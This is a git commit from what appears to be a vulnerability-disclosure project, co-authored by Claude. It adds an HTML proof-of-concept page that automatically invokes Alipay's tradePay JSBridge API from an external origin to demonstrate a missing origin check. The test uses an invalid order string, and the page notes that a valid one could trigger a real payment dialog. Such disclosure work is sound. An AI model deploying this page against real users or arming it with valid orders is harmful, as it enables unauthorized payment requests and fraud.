feat: global navigation bar + verification badge across all 9 pages

- Unified nav bar with links to all research articles - Verification badge: Docker 37/37, Zenodo DOI, IACR 2026/526, Packet Storm - Mobile responsive hamburger menu - PoC payloads and evidence screenshots added - Draft articles and planning files included Co-Authored-By: Claude <noreply@anthropic.com>
2026-06-27 05:34:17 +08:00 · 2026-03-25 05:31:19 +08:00
parent a3825c939f
commit cae3c54867
42 changed files with 3665 additions and 9 deletions
--- a/poc/payload_cve3.html
+++ b/poc/payload_cve3.html
@@ -0,0 +1,147 @@
+<!DOCTYPE html>
+<html><head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width,initial-scale=1">
+<title>CVE-3 Verification</title>
+<style>
+*{margin:0;padding:0;box-sizing:border-box}
+body{font-family:-apple-system,system-ui,sans-serif;background:#fff;color:#333;padding:16px}
+.banner{background:#f5222d;color:#fff;padding:16px;border-radius:10px;text-align:center;margin-bottom:16px}
+.banner h1{font-size:18px}
+.banner p{font-size:12px;opacity:.85;margin-top:4px}
+.result{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
+.result h2{color:#389e0d;font-size:15px;margin-bottom:8px}
+.fail{background:#fff2f0;border-color:#ff4d4f}
+.fail h2{color:#cf1322}
+.pending{background:#fffbe6;border-color:#faad14}
+.pending h2{color:#d48806}
+.item{padding:6px 0;border-bottom:1px solid #f0f0f0;font-size:13px}
+.item:last-child{border:none}
+.label{color:#888;font-size:11px}
+.value{color:#333;font-weight:600}
+.warn{background:#fff7e6;border:1px solid #ffd591;border-radius:8px;padding:10px;font-size:11px;color:#d46b08;margin:10px 0;line-height:1.5}
+.ts{color:#999;font-size:10px;text-align:center;margin-top:16px}
+#status{font-size:14px;color:#1677ff;text-align:center;padding:20px}
+</style>
+</head><body>
+
+<div class="banner">
+  <h1>CVE-3: tradePay Unauthorized Invocation</h1>
+  <p>CWE-940 | CVSS 8.6 | Payment dialog triggered from external page</p>
+</div>
+
+<div class="warn">
+  <b>Safety:</b> This test uses an INVALID order string "SECURITY_TEST_INVALID_ORDER_2026".
+  No real transaction will occur. The proof is that the payment dialog appears at all —
+  an external page should NEVER be able to invoke tradePay.
+</div>
+
+<div id="status">Waiting for AlipayJSBridge...</div>
+<div id="results"></div>
+<div class="ts" id="timestamp"></div>
+
+<script>
+var el = document.getElementById('results');
+var status = document.getElementById('status');
+var tradePayResults = [];
+
+function render() {
+  var html = '';
+  var isAlipay = /AlipayClient|Nebula/i.test(navigator.userAgent);
+
+  html += '<div class="result"><h2>Environment</h2>';
+  html += '<div class="item"><span class="label">Page Origin: </span><span class="value">' + location.origin + '</span></div>';
+  html += '<div class="item"><span class="label">Inside Alipay: </span><span class="value">' + (isAlipay ? 'YES' : 'Detection pending') + '</span></div>';
+  html += '<div class="item"><span class="label">JSBridge: </span><span class="value">' + (window.AlipayJSBridge ? 'AVAILABLE' : 'Not loaded') + '</span></div>';
+  html += '</div>';
+
+  if (tradePayResults.length > 0) {
+    var latest = tradePayResults[tradePayResults.length - 1];
+    html += '<div class="result' + (latest.dialogShown ? '' : ' fail') + '"><h2>tradePay Invocation Result</h2>';
+    html += '<div class="item"><span class="label">API Called: </span><span class="value" style="color:#f5222d">AlipayJSBridge.call("tradePay", ...)</span></div>';
+    html += '<div class="item"><span class="label">Order String: </span><span class="value" style="font-size:10px;word-break:break-all">' + latest.orderStr + '</span></div>';
+    html += '<div class="item"><span class="label">Response Code: </span><span class="value">' + (latest.resultCode || 'N/A') + '</span></div>';
+    html += '<div class="item"><span class="label">Response: </span><span class="value" style="word-break:break-all;font-size:10px">' + latest.rawResponse + '</span></div>';
+    html += '<div class="item"><span class="label">Timestamp: </span><span class="value">' + latest.time + '</span></div>';
+
+    if (latest.dialogShown) {
+      html += '<div class="item"><span class="label">CRITICAL: </span><span class="value" style="color:#f5222d">Payment dialog was triggered from an external attacker page!</span></div>';
+    }
+    html += '</div>';
+
+    // Proof section
+    html += '<div class="result"><h2>Vulnerability Proof</h2>';
+    html += '<div class="item"><span class="label">What happened: </span><span class="value">External page at ' + location.origin + ' called tradePay JSAPI</span></div>';
+    html += '<div class="item"><span class="label">Expected: </span><span class="value">tradePay should ONLY be callable from Alipay-owned/trusted pages</span></div>';
+    html += '<div class="item"><span class="label">Actual: </span><span class="value" style="color:#f5222d">tradePay was invoked from external domain — no origin check</span></div>';
+    html += '<div class="item"><span class="label">Root Cause: </span><span class="value">TradePayBridgeExtension.tradePay() does not validate calling page origin</span></div>';
+    html += '<div class="item"><span class="label">Real Attack: </span><span class="value">With a valid merchant orderStr, this could trigger real payment dialog</span></div>';
+    html += '</div>';
+  } else if (window.AlipayJSBridge) {
+    html += '<div class="result pending"><h2>tradePay Test Ready</h2>';
+    html += '<div class="item"><span class="label">Status: </span><span class="value">About to call tradePay with invalid order...</span></div>';
+    html += '</div>';
+  }
+
+  el.innerHTML = html;
+  document.getElementById('timestamp').textContent = 'Evidence collected at: ' + new Date().toISOString();
+}
+
+function tryTradePay() {
+  if (!window.AlipayJSBridge) return;
+
+  var orderStr = 'SECURITY_TEST_INVALID_ORDER_2026';
+  status.textContent = 'Calling tradePay...';
+  status.style.color = '#fa8c16';
+  render();
+
+  AlipayJSBridge.call('tradePay', {
+    orderStr: orderStr
+  }, function(result) {
+    var entry = {
+      time: new Date().toISOString(),
+      orderStr: orderStr,
+      rawResponse: JSON.stringify(result),
+      resultCode: result.resultCode || result.result_code || 'N/A',
+      dialogShown: false
+    };
+
+    // resultCode 6001 = user cancelled (means dialog DID appear)
+    // resultCode 4000 = order error (API was reached but order invalid)
+    // resultCode 8000 = processing
+    // resultCode 9000 = success (should not happen with invalid order)
+    var code = String(result.resultCode || result.result_code || '');
+    if (code === '6001' || code === '6002' || code === '4000' || code === '8000' || code === '9000') {
+      entry.dialogShown = true;
+      status.textContent = 'tradePay INVOKED — Response code: ' + code;
+      status.style.color = '#f5222d';
+    } else {
+      status.textContent = 'tradePay called — Response: ' + JSON.stringify(result).substring(0, 100);
+      status.style.color = '#fa8c16';
+    }
+
+    tradePayResults.push(entry);
+    render();
+  });
+}
+
+function checkBridge() {
+  if (window.AlipayJSBridge) {
+    status.textContent = 'AlipayJSBridge detected — invoking tradePay...';
+    render();
+    setTimeout(tryTradePay, 500);
+  } else {
+    status.textContent = 'Page loaded at ' + location.origin + ' — waiting for bridge...';
+    render();
+  }
+}
+
+document.addEventListener('AlipayJSBridgeReady', function() {
+  checkBridge();
+});
+
+checkBridge();
+setTimeout(checkBridge, 1000);
+setTimeout(checkBridge, 3000);
+</script>
+</body></html>